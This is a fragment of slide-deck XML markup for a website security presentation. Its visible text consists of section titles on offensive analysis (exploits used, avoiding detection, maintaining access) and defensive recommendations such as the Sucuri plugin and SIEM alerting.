            <a:off x="0" y="5962375"/>
            <a:ext cx="242469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lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Securi Plugin can easily be installed and configured even by the non-developer user. </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="8236600"/>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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Editing user permission and configuration files can be implemented by a technically savvy user or by a contractor.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118600" y="10510825"/>
            <a:ext cx="19527600" cy="16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sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Maintaining a SIEM with appropriate alerts and thresholds is necessary to monitor all malicious traffic.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8" name="Google Shape;158;p2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9" name="Google Shape;159;p24"/>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Part 1: Offensive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0" name="Google Shape;160;p24"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731368" y="5349367"/>
            <a:ext cx="22914900" cy="21129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lang="en-US"/>
              <a:t>The End</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11" name="Google Shape;71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Part I: Offensive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p2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68" name="Google Shape;168;p25"/>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69" name="Google Shape;169;p25"/>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Topics Covered:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="5956133"/>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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203400"/>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rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintaining Access</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="10450600"/>
            <a:ext cx="24443100" cy="1618500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="4144550" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3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79" name="Google Shape;179;p2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80" name="Google Shape;180;p26"/>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81" name="Google Shape;181;p26"/>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